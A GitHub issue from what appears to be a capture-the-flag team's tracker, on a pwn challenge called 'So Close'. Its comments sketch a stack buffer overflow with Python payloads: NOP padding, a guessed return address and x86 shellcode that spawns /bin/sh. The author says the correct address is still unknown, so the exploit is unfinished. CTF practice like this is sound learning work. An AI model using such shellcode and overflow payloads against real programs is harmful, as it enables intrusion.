Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Stage 3 - So Close #32

Open
ikornaselur opened this issue Aug 13, 2016 · 3 comments
Open

Stage 3 - So Close #32

ikornaselur opened this issue Aug 13, 2016 · 3 comments
Labels
type:pwn

Comments

@ikornaselur
Copy link
Collaborator

Description

Yet so far :(
/home/so_close on the shell.

Solution

Flag is: ``
@ikornaselur
Copy link
Collaborator Author

It's a buffer overflow exploit that requires a shellcode to be crafted.

Bytes 269-272 in the input will overwrite the return pointer. I thing we need to figure out the address to where the input is stored and then jump into it after writing shellcode to read the flag. I just don't remember exactly how to do this all, so I'm going to take a short break from this.

padding = 268
address = "\x91\x92\x93\x94"

print "\x90"*padding + address

@ikornaselur
Copy link
Collaborator Author

screen shot 2016-08-13 at 18 51 11

EBP there overwritten by the python script above.

@ikornaselur ikornaselur changed the title Stage 2 - So Close Stage 3 - So Close Aug 14, 2016
@ikornaselur
Copy link
Collaborator Author 

padding = 268
address = "\x95\x84\x04\x08"
shell = "\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x6a\x0b\x58\x89\xe3\x31\xc9\x99\xcd\x80"
padding = padding - len(shell)

print "\x90" * padding + shell + address

Think this is it.. just don't know the correct address

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
type:pwn
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@ikornaselur